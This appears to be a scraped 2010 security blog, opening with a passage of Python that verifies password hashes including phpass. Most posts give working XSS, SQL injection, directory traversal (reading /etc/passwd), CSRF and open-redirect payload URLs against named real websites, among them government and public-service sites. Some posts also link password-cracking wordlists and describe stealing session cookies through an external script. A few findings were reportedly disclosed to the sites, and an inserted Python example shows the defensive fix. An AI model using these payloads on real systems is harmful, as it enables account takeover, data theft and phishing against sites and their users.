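    every username-based scheme, which is an assumption for the others."""
    return SCHEMES[scheme](password.encode(), salt.encode(), username.lower().encode())


def verify_password(scheme: str, password: str, stored_hex: str,
                    salt: str = "", username: str = "") -> bool:
    return hmac.compare_digest(hash_password(scheme, password, salt, username), stored_hex.lower())


# phpass portable hashes: $P$ (WordPress) or $H$ (phpBB 3), then one
# character of log2(iteration count), an 8-character salt and 22 characters
# of phpass's own base64 over the 16-byte MD5 result.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes) -> str:
    """phpass encode64(): little-endian 6-bit groups, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Compute a $P$ hash for a given salt (phpass itself draws the salt at
    random; its PHP 5 default is count_log2 = 8 + 5 = 13, i.e. 8192 rounds)."""
    if len(salt) != 8 or not 7 <= count_log2 <= 30:
        raise ValueError("bad salt or iteration count")
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + _encode64(h)


def phpass_check(password: str, stored: str) -> bool:
    """Verify against a stored $P$/$H$ hash in constant time."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        return False
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:
        return False
    computed = phpass_hash(password, stored[4:12], count_log2)
    return hmac.compare_digest(stored[:3] + computed[3:], stored)
```

The scheme names are the table's own strings, so a row can be looked up and verified directly. phpass is worth spelling out precisely because it is not a one-shot MD5: the header carries log2 of an iteration count (2048 rounds for '9', 8192 for the PHP 5 default 'B') and an 8-character salt, which is why the phpBB 3 and WordPress >= 2.5 entries cannot be cracked with a plain MD5 lookup.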

Saturday, 24 April 2010

Theregister.co.uk XSS


Lately I've found a stored XSS on theregister.co.uk.
The XSS can be triggered only by sending, via a POST request,
both the "job_function" and "other_job_function" values (or both "job_sector" and "other_job_sector")
in the users' area.
By sending a specific link we can escalate privileges by automating the reset of the victim's password.
Obviously the victim has to be logged in!
A full video explains how to get other accounts starting from the stored XSS and a few CSRFs.

You can watch here a video explaining the problem and a simulated
hijacking of a The Register user's session.

Archived page on securitytube: http://archive.is/OgZlz


They have already replied to my email and solved the problem! Thumbs up for them.

Thursday, 22 April 2010

List of wordlists

I've put up a list of links to several wordlists. Links have been grabbed from several websites:

I don't know your blog; I've found the links on different websites.

(I've used http://rapiddigger.com/ and similar sites, so I didn't care about the references before. Add a comment if you want a link; no problem at all.)
http://carlitobrigante.wordpress.com/2008/03/21/wyd-e-raccolta-wordlist/
http://blog.advanced-techno.net/index.php/2008/07/13/wordlist-da-15-gb/
http://www.backtrack-linux.org/forums/old-pentesting/4336-%3Dxploitz%3D-thread-share-wordlist-2.html
http://www.ashiyane.org/forums/showthread.php?p=60160
http://hashcrack.blogspot.com

I will update the list when I find/need other links.

http://rapidshare.com/files/135050307/wordlist--hrvatski.txt.html
http://rapidshare.com/files/67152210/1_5GB_Wordlist_gepackt_5MB_.rar
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://www.outpost9.com/files/WordLists.html
http://hashkiller.com/files/downloads/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://vxchaos.6x.to/Wordlists and Wordlist Tools/
http://www.hack3r.com/wordlists/wikipedia-wordlist-sraveau-20090325.txt.bz2
http://downloads.sourceforge.net/cracklib/cracklib-words-20080507.gz
http://packetstormsecurity.org/Crackers/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.vulnerabilityassessment.co.uk/passwords.zip
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.insidepro.com/eng/download.shtml
http://www.apasscracker.com/dictionaries/
http://downloads.skullsecurity.org/passwords/
http://rapidshare.com/files/88229830/Wordlist.rar
http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz
http://www.megaupload.com/?d=QTK6GI9K | birthdates
http://www.megaupload.com/?d=XV34VA9Z | default wpa list 8 to 40 alpha-numeric chararacters
http://www.megaupload.com/?d=L7LQSH5U |BIG WPA WORDLIST #1
http://www.megaupload.com/?d=2P23UCLV |BIG WPA WORDLIST #2
http://www.megaupload.com/?d=F6DEE204 |BIG WPA WORDLIST #3
http://article7.org/wordlists/
http://rapidshare.com/files/100655354/Bender-ILLIST.rar.html
http://milw0rm.org/mil-dic.php
http://www.rohitab.com/discuss/index.php?s=fc0c2d65c4f55e204846775b49346668&app=core&module=attach&section=attach&attach_id=1235
http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz
http://nomorecrypto.com/files/naxxatoe-dict-total-new-unsorted.torrent
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://bright-shadows.net/download/downloads.php
http://www.mit.edu/~ecprice/wordlist.10000
http://www.neutronsite.com/WordList.txt
http://artofhacking.com/tucops/hack/password/
http://rapidshare.com/files/165513464/word.lst.s.u.john.s.u.200.part01.rar |wordlist su john #1
http://rapidshare.com/files/165518143/word.lst.s.u.john.s.u.200.part02.rar |wordlist su john #2
http://rapidshare.com/files/165498510/word.lst.s.u.john.s.u.200.part03.rar |wordlist su john #3
http://rapidshare.com/files/90611743/purehates_word_list.part1.rar | purehates wordlist #1
http://rapidshare.com/files/90620632/purehates_word_list.part2.rar | purehates wordlist #2
http://rapidshare.com/files/90628318/purehates_word_list.part3.rar | purehates wordlist #3
http://rapidshare.com/files/90636711/purehates_word_list.part4.rar | purehates wordlist #4
http://rapidshare.com/files/90639703/purehates_word_list.part5.rar | purehates wordlist #5
http://rapidshare.com/files/90571168/-_Xploitz_-_Master_Password_Collection.part1.rar
http://rapidshare.com/files/90580220/-_Xploitz_-_Master_Password_Collection.part2.rar
http://rapidshare.com/files/90584305/-_Xploitz_-_Master_Password_Collection.part3.rar
http://rapidshare.com/files/90592992/-_Xploitz_-_Master_Password_Collection.part4.rar
http://rapidshare.com/files/90598343/-_Xploitz_-_Master_Password_Collection.part5.rar
http://rapidshare.com/files/90603742/-_Xploitz_-_Master_Password_Collection.part6.rar
http://rapidshare.com/files/90605481/-_Xploitz_-_Master_Password_Collection.part7.rar -->-> Password: http://forums.remote-exploit.org/
http://rapidshare.com/files/90652987/-_Xploitz_-_PASSWORD_DVD.part01.rar
http://rapidshare.com/files/90660770/-_Xploitz_-_PASSWORD_DVD.part02.rar
http://rapidshare.com/files/90673505/-_Xploitz_-_PASSWORD_DVD.part03.rar
http://rapidshare.com/files/90682244/-_Xploitz_-_PASSWORD_DVD.part04.rar
http://rapidshare.com/files/90691363/-_Xploitz_-_PASSWORD_DVD.part05.rar
http://rapidshare.com/files/90700044/-_Xploitz_-_PASSWORD_DVD.part06.rar
http://rapidshare.com/files/90702550/-_Xploitz_-_PASSWORD_DVD.part07.rar -->-> Password: http://forums.remote-exploit.org/

Tuesday, 20 April 2010

Anti rootkits list


 ATool - http://www.antiy.net/download/atool.rar
 ATool (mirror) - http://www.kernelmode.info/ARKs/atool.rar
 Avast! Antirootkit - http://files.avast.com/files/beta/aswar.exe
 Antivir Antirootkit - http://dl.antivir.de/down/windows/antivir_rootkit.zip
 Catchme - http://www2.gmer.net/catchme.exe
 CodeWalker ARK - http://cmcinfosec.com/download/cmcark_cw0.2.4.500.rar
 CodeWalker ARK (mirror) - http://www.kernelmode.info/ARKs/cmcark_cw0.2.4.500.rar
 CsrWalker - http://www.rootkit.com/vault/DiabloNova/cwalker.rar
 DarkSpy 1.05 - http://www.rootkit.com/vault/cardmagic/DS105fix2beta.rar
 DeepMonitor - http://orkblutt.free.fr/DeepMonitor.exe
 Deep System Explorer - http://diamondcs.com.au/downloads/dsesetup.exe
 Dr. Web DwShark (mirror) - http://www.kernelmode.info/ARKs/DwShark.rar
 F-Secure Blacklight - ftp://ftp.f-secure.com/anti-virus/tools/fsbl.exe
 Find_Hidden_Dll (by Eric_71) 0.1.1.1 - http://eric71.geekstogo.com/beta/Find_Dll.exe
 GMER - http://www2.gmer.net/gmer.zip
 Helios - http://helios.miel-labs.com/downloads/Helios.zip
 Helios Lite - http://helios.miel-labs.com/downloads/Helios-Lite.zip
 HiddenFinder - http://www.wenpoint.com/download/HiddenFinder_setup.exe
 Hook Analyzer - http://www.resplendence.com/download/hookanlz302.exe
 HookShark - http://home.arcor.de/neotracer/HookShark.rar
 IceSword 1.22 (english) - http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip
 IceSword 1.22 (english) (mirror) - http://www.kernelmode.info/ARKs/IceSword122en.zip
 Kernel Detective v1.3.1 - http://www.at4re.com/files/Tools/Releases/GamingMasteR/Kernel_Detective_v1.3.1.zip
 Kernel Detective v1.3.1 (mirror) - http://www.kernelmode.info/ARKs/Kernel_Detective_v1.3.1.zip
 kX-Ray 1.0.0.102 - http://bugczech.fu8.com/bin/kX-Ray_v1.0.0.102_XP32_beta.zip
 McAfee Rootkit Detective - http://download.nai.com/products/mcafee-avert/McafeeRootkitDetective.zip
 modGREPER - http://invisiblethings.org/tools/modGREPER/modGREPER-0.3-bin.zip
 NIAP Rootkit Detect Tools - http://www.rootkit.com/vault/uty/NIAPAntiRootkitTools.rar
 Panda Antirootkit - http://research.pandasecurity.com/blogs/images/AntiRootkit.zip
 Process Hunter - http://www.wasm.ru/baixado.php?mode=tool&id=359
 Process Walker - http://www.rootkit.com/vault/DiabloNova/ProcessWalker.rar
 Radix - http://www.usec.at/downloads3/radix_installer.zip
 RegReveal - http://www.geocities.jp/kiskzo/regreveal_v10beta3.zip
 RootkitDetector - http://www.tarasco.org/security/Rootkit_Detector_rkdetector/RootkitDetector.zip
 Rootkit Unhooker 3.8 - http://www.rootkit.com/vault/DiabloNova/RkU3.8.386.589.rar
 Rootkit Revealer - http://download.sysinternals.com/Files/RootkitRevealer.zip
 RootQuest (dead link) - http://comsentry.com/files/RootQuest_v1.exe
 RootQuest (mirror) - http://www.kernelmode.info/ARKs/RootQuest_v1.rar
 RootRepeal - http://rootrepeal.googlepages.com/RootRepeal.rar
 Safe'n'Sec Personal Pro + Rootkit Detector - http://www.safensoft.com/sns/snsrd_eng.exe
 SafetyCheck 1.7 - http://yyuyao.googlepages.com/SafetyCheck1.7Beta.rar
 SanityCheck 2.00 - http://www.resplendence.com/download/sanitySetup.exe
 Sophos Antirootkit - http://www.sophos.com/products/free-tools/sophos-anti-rootkit/download/
 Stealth MBR Rootkit Detector - http://www2.gmer.net/mbr/mbr.exe
 SysProt Antirootkit - http://sites.google.com/site/sysprotantirootkit/Home/SysProt.zip?attredirects=0&d=1
 SysReveal - http://www.sysreveal.com/download/SysReveal.zip
 TDSS Remover - http://www.esagelab.com/files/tdss_remover_latest.rar
 Tizer Rootkit Razor - http://www.tizersecure.com/freedownloads/Tizer%20Rootkit%20Razor%20Setup.msi
 TrendMicro RootkitBuster - http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_2.80.1077.zip
 VBA32 Antirootkit - ftp://vba.ok.by/vba/beta/Vba32arkit_beta.zip
 XueTr - http://xuetr.com/download/XueTr.zip
 YasKit 1.223 - http://qzdx.kafan.cn/down1//AntiSpyWare/2009/YasKit1.223.rar
 YasKit 1.223 (mirror) - http://www.kernelmode.info/ARKs/YasKit1.223.rar




Ref: kernelmode.info

Sunday, 18 April 2010

rot13 party | XSS forms

Ok ... now with the rot13


string
 </textarea><script>alert(document.cookie);</script><textarea>
encoded
 </grkgnern><fpevcg>nyreg(qbphzrag.pbbxvr);</fpevcg><grkgnern>
------------------------------------------
sites with the raw POST body


http://www.rot13.com/index.php
text=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://rot13-encoder-decoder.ewebdev.com/
plain_text_for_rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%281%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




http://authors.aspalliance.com/brettb/ROT13EncodingWithASP.asp
ROT13=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&B1=Encode%2FDecode+ROT13


http://www.retards.org/projects/rot13/
rotme=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://edoceo.com/utilitas/rot13
in=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cmd=ROT13


http://geekgirl.dk/stuff/rot13.html
intext=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://mcraigweaver.com/rot13.php
raw=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cooked=&Rotate=Rotate+it.


http://doug.finalownage.com/tools/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://www.geomatics.ca/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encrypt+%2F+Decrypt&submitted=yes


http://spectraldesign.net/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&convert=ROT-13


http://lowkeysoft.com/LostARG/rot13.php
decoding=true&code=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&submit=Decode




http://www.toms-geocache.de/Werkzeuge/rot13.php?txtROT13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&btnCoder=kodieren


http://www.lasoft.cz/gc/hw/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=%C5%A0ifruj+%2F+de%C5%A1ifruj


http://www.viruscom2.com/web-app/encode-decode-ROT13.php
textCode=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encode-Decode+Now%21%21%21


http://www.nwhtweb.com/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://kamil.eu.org/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




------------------------------------------------
Urg .... most of them are repetitive and too simple. 

sourcecodesworld.com - givemethecode.com | XSS SQL Injection



asp/mysql SQL INJ
http://www.sourcecodesworld.com/showScriptSite.asp?ScriptId=459




XSS (back from google?)
http://www.sourcecodesworld.com/search.asp?domains=www.sourcecodesworld.com%3Bwww.givemethecode.com&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&sa=Google+Search&sitesearch=www.sourcecodesworld.com&client=pub-6213915329796065&forid=1&channel=7633136160&ie=ISO-8859-1&oe=ISO-8859-1&cof=GALT%3A%23995500%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3AB00C00%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A004F23%3BALC%3AB00C00%3BLC%3AB00C00%3BT%3A000000%3BGFNT%3A000000%3BGIMP%3A000000%3BLH%3A50%3BLW%3A313%3BL%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%2Fimages%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%3BFORID%3A11&hl=en


XSS

http://www.givemethecode.com/sign.asp?returnURL=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22http://www.givemethecode.com/source/view-my-source.asp

http://base64-decode.php-functions.com/ | XSS

The idea is to feed a decoder (base64 in this case) data that decodes to markup and see whether the decoded output is written into the page unescaped, so the XSS fires.


http://base64-decode.php-functions.com/

other websites



http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec






We need to submit this string base64 encoded
 -------------------------------------------------------------
<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>
  -------------------------------------------------------------
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu
dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==
 -------------------------------------------------------------


Note: the <textarea> tags are useless in this case, but they work in 90% of the similar cases where the result is shown inside a textarea.


a different one with text input
 http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=


----------------------------------------


I've found another, more trivial base64 decoder, with a few differences:
http://www.toastedspam.com/decode64
- it doesn't decode the data correctly
- it tries to remove/convert <> with some html entities


I've spent about ten minutes (sic) achieving this XSS.




The string to convert (b=a; is padding so that the decoded string has no stray characters at the end)
a=document.cookie; b=a; alert(a); 
The converted string
YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7





When submitting the data, use Tamper Data (or Firebug, to edit the HTML) and
change disp to script (disp=script)


text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script
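The rot13 post and the base64 post above share one root cause: an online encoder/decoder takes user input, transforms it, and writes the result straight into the page (usually inside a textarea), and in the last case a client-chosen disp parameter even selects a raw script wrapper. The transform is harmless; the missing HTML encoding on output is the bug. The following is an added example, not code from the original posts or from any of the sites listed: it applies the two transforms to the posts' own strings and renders the result both the vulnerable way and the hardened way (the DISPLAY_MODES allowlist is an assumption).

```python
import base64
import codecs
import html

# Strings quoted in the two posts above, constructed here from the posts' text.
ROT13_ENCODED = "</grkgnern><fpevcg>nyreg(qbphzrag.pbbxvr);</fpevcg><grkgnern>"
BASE64_ENCODED = (
    "PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu"
    "dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg=="
)

# Allowed values of the output-mode switch (the "disp" parameter in the last post).
# Assumed for illustration; "script" is deliberately not in it.
DISPLAY_MODES = ("textarea", "pre")


def rot13(text: str) -> str:
    """The transform every rot13 page applies; it is its own inverse."""
    return codecs.encode(text, "rot_13")


def b64decode_text(data: str) -> str:
    """Decode base64 as submitted by a form: tolerate wrapped lines, reject junk."""
    raw = base64.b64decode("".join(data.split()), validate=True)
    return raw.decode("utf-8", errors="replace")


def render_unsafe(decoded: str, disp: str = "textarea") -> str:
    """What the vulnerable tools do: the decoded text is concatenated into the
    page as-is, and a client-chosen mode like disp=script even picks a raw
    <script> wrapper, so the submitted data becomes code."""
    if disp == "script":
        return f"<script>{decoded}</script>"
    return f"<{disp}>{decoded}</{disp}>"


def render_safe(decoded: str, disp: str = "textarea") -> str:
    """Hardened: the mode comes from an allowlist and the data is HTML-encoded
    on output, so </textarea> and <script> arrive as text, not markup."""
    if disp not in DISPLAY_MODES:
        disp = "textarea"
    return f"<{disp}>{html.escape(decoded, quote=True)}</{disp}>"


def breaks_out(page: str, disp: str = "textarea") -> bool:
    """Check: user data escaped its container if the page closes the container
    more than once, or if a script tag appears at all."""
    lower = page.lower()
    return lower.count(f"</{disp}>") != 1 or "<script" in lower


if __name__ == "__main__":
    for label, decoded in (("rot13", rot13(ROT13_ENCODED)),
                           ("base64", b64decode_text(BASE64_ENCODED))):
        print(label, "unsafe breaks out:", breaks_out(render_unsafe(decoded)))
        print(label, "safe breaks out:  ", breaks_out(render_safe(decoded)))
```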



tobu.co.jp | xss

The Tobu railway in Japan.


http://www.tobu.co.jp/transit_fare/?link=http://eki.tobu.co.jp/norikae/pc/N3?USR=PC&sf=1735-%91%e5%98a%93c&st=2319-%90V%8b%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22%cb%90%b6&sr=0&pn=3&rp=0&tp=0&ep=1&date=2'0100418&time=0910

www.normateneo.unibo.it | xss

simple
http://www.normateneo.unibo.it/NormAteneo/default.htm?search=0&view=1&PageNumber=1&textToSearch=%22%3e%3cscript%3ealert(document.cookie)%3b%3c%2fscript%3e%3c%22

Saturday, 17 April 2010

turkstat.gov.tr | XSS - sys compromise

http://www.turkstat.gov.tr/kp/kullanici/forgotPassword.do?reqCode=pre%3Cscript%3Ealert(1);%3C/script%3EpareForgotPasswordForm

tehran.gov.ir | sql injection - XSS - system compromise


Set free all the political captives, all the human rights activists.
The Iranian Government should think about its internal problems instead of arguing about anything.
Iran and the USA MUST stop all the atomic programs.
The new Iran must be secular, with the freedom to choose your religion, peaceful and without any kind of violence!

Equal rights for women!
Stop the violence!
------------------------------------------------------------------------- 



there are for sure other xss and sql injections.

several sql injections in NewsId
http://www.tehran.gov.ir/new/Default_view.asp?NewsId=13892


XSS in name
http://www.tehran.gov.ir/new/Default_Services.asp?chid=17&name=<script>alert(document.cookie);</script>


The system (a Windows box) could be compromised and the source code obtained due to a misconfiguration.
You can download the source code here.

Friday, 16 April 2010

Watch youtube with opera browser - "GO UPGRADE!"

YouTube has updated the website, practically kicking the butt of Opera users with the permanent message "GO UPGRADE!".

There's a workaround to fix this issue!
Just install this user javascript file


Before anything else, if you haven't done it before, you must create the folder for the scripts (I suggest a folder within the Opera application folder ... or, if you prefer, in the application data).
I've used "%programfiles%\Opera\JS"
Put this javascript in the folder. -click here-

( copyright 2010, Snap )
After that, open Opera, go to File->Preferences->Advanced->Content->JavaScript Options and
select the User JavaScript folder.


Reference: http://extendopera.org/userjs/content/youtube-protection-remover 

mail.com | xss, possible phishing/spam


http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002žscriptualert(EXSSE)ž/scriptu&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=30530-web-20100416-201528&rt=STANDARD#x0D;ascript:alert(%27myxss%27);%22%3E&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=anything&rt=STANDARD


base url: http://web.mail.com/
31423-111 - can be anything (url rewriting??)
mmc-2/ - can be anything (url rewriting??)
en-us - can be anything (url rewriting??). This should set the language.
common - can be anything (url rewriting??)



A funny joke XD (for me)
http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=You need to buy a new computer&rt=STANDARD

europa.eu - xpath injections

europa.eu is mainly based on ColdFusion, with Oracle as the DBMS (via JDBC).
The main website is probably proxied via http://yakima.cc.cec.eu.int:6085 (I'm not able to clearly understand all the errors from ColdFusion).


------link removed as requested------

I cannot publish the url but it's easy to spot (in my opinion).

Note: A few hours with a fuzzer can give you good results.
-------

usa.gov | xss, remote code execution

The Taliban could attack the USA's website too :) lol.

I don't want to offend anybody ... it's just to say something funny.
And I've warned the tech support instead of defacing the website, as someone else could have done for a lot of popularity.



http://answers.usa.gov/cgi-bin/gsa_ict.cfg/php/enduser/chat.php


sample
"><script>alert(document.cookie);</script><"


With a more elaborate (external) script you can create a phishing page with a different chat.
With a bit of social engineering and an external script (my post2get.php?) you can even grab the cookies.
I've already grabbed a session id but without luck (I don't know the administrative/login/authentication pages, and I don't want to know them 8) ).




Remote code execution. Input is not sanitized.








As proof, I contacted them via the (same) chat.
-----------------------------------------------------------
Karessa G.: Hi, my name is Karessa G.. How may I help you?
walter : hello
walter : are you human or a bot?
Karessa G.: I am a real person. How may I help you today?
walter : Ok. I'm not American. Anyway you've a small problem with this chat. Malicious persons can gather sensitive information about the users' sessions via XSS (cross site scripting). This is quite important for your security (I suppose). If you can, send this information to the technical staff.
Karessa G.: One of our staff members, Jacob Parcell, is the best resource to answer your inquiry. Please e-mail him with your questions and he will be happy to answer them. His e-mail address is jacob.parcell@gsa.gov.
Karessa G.: I hope you find this information helpful. Do you have any other questions?
walter : I don't need an answer. It's your problem. Anyway I will send him an email.
Karessa G.: Thank you.
walter : Have a nice day :)
Karessa G.: You too.
Karessa G.: Thank you for contacting USA.gov. We would like your feedback on our performance. You can let us know what you think by visiting  http://www.info.gov/NCCsurvey.htm You may need to copy and paste that link into your browser's address bar.
-----------------------------------------------------------


After that I sent the email.

They replied after about 3 days. They are checking the problems right now.

provincia.benevento.it - directory traversal - sql injections - remote code execution

Yes ... "you are so cool" phpnuke was not so cool. :)
http://www.provincia.benevento.it/?name=Search&file=../../../../../../../../../etc/passwd

php-stats remote execution in admin.php| sql injections
http://www.provincia.benevento.it/stats/

INPS - xss, spam/phishing, sql injection, CSRF, users' data access (no auth)

Possible spam/phishing


http://www.inps.it//newportal/default.aspx?txtNumero=%22%3Epassword:%20%3Cinput%20type=%22text%22%3E%3Cinput%20type=%22submit%22%3E%3C%22&txtTesto=%20test%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812
http://www.inps.it//newportal/default.aspx?txtNumero=2&txtTesto=%20rantolo">%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812
http://www.inps.it//newportal/default.aspx?txtNumero=2&cboAnno=&cboDal=%22%3E1979&cboAl=2011&txtTesto=+rantolo&cboOrdina=%27data%26sortdirection%3Ddesc&x=61&y=-1&sTrova=%22%3E%3Ca%20href=http://www.google.com%3E%3Ch3%3Egoogola%3C/h3%3E%3C/a%3E%3Cdiv%20style=%22width:%20900px;%22id=%22a&sCategoria=3


Poems can be fun (spam)
http://www.inps.it/Modulistica/compila.asp?idArea=2&AreaDesc=La%20donzelletta%20vien%20dalla%20campagna,In%20sul%20calar%20del%20sole,Col%20suo%20fascio%20dell'erba;%20e%20reca%20in%20manoUn%20mazzolin%20di%20rose%20e%20di%20viole,Onde,%20siccome%20suole,Ornare%20ella%20si%20apprestaDimani,%20al%20d%EC%20di%20festa,%20il%20petto%20e%20il%20crine.Siede%20con%20le%20vicineSu%20la%20scala%20a%20filar%20la%20vecchierella,Incontro%20l%E0%20dove%20si%20perde%20il%20giorno;E%20novellando%20vien%20del%20suo%20buon%20tempo,Quando%20ai%20d%EC%20della%20festa%20ella%20si%20ornava,Ed%20ancor%20sana%20e%20snellaSolea%20danzar%20la%20sera%20intra%20di%20queiCh'ebbe%20compagni%20dell'et%E0%20pi%F9%20bella.Gi%E0%20tutta%20l'aria%20imbruna,Torna%20azzurro%20il%20sereno,%20e%20tornan%20l'ombreGi%F9%20d%E0%20colli%20e%20d%E0%20tetti,Al%20biancheggiar%20della%20recente%20luna.Or%20la%20squilla%20d%E0%20segnoDella%20festa%20che%20viene;Ed%20a%20quel%20suon%20direstiChe%20il%20cor%20si%20riconforta.I%20fanciulli%20gridandoSu%20la%20piazzuola%20in%20frotta,E%20qua%20e%20l%E0%20saltando,Fanno%20un%20lieto%20romore:E%20intanto%20riede%20alla%20sua%20parca%20mensa,Fischiando,%20il%20zappatore,E%20seco%20pensa%20al%20d%EC%20del%20suo%20riposo.Poi%20quando%20intorno%20%E8%20spenta%20ogni%20altra%20face,E%20tutto%20l'altro%20tace,Odi%20il%20martel%20picchiare,%20odi%20la%20segaDel%20legnaiuol,%20che%20vegliaNella%20chiusa%20bottega%20aa%20a,E%20s'affretta,%20e%20s'adopraDi%20fornir%20l'opra%20anzi%20il%20chiarir%20dell'alba.Questo%20di%20sette%20%E8%20il%20pi%F9%20gradito%20giorno,Pien%20di%20speme%20e%20di%20gioia:Diman%20tristezza%20e%20noiaRecheran%20l'ore,%20ed%20al%20travaglio%20usato




CSRF for the pin request
http://www.inps.it/newportal/default.aspx?sID=%3B0%3B&iMenu=2&ServAction=Richiesta+PIN+On+Line&iiDServizio=88&sURL=https%3A//servizi.inps.it/servizi/PinOnLine/Internet/




Bypassed the filter on the redirect
http://www.inps.it/bussola/VisualizzaDoc.aspx?iIDLink=&iIDDalPortale=&sExtURL=http://www.google.com/https%3A//servizi.inps.it/servizi/PinOnLine/Internet/
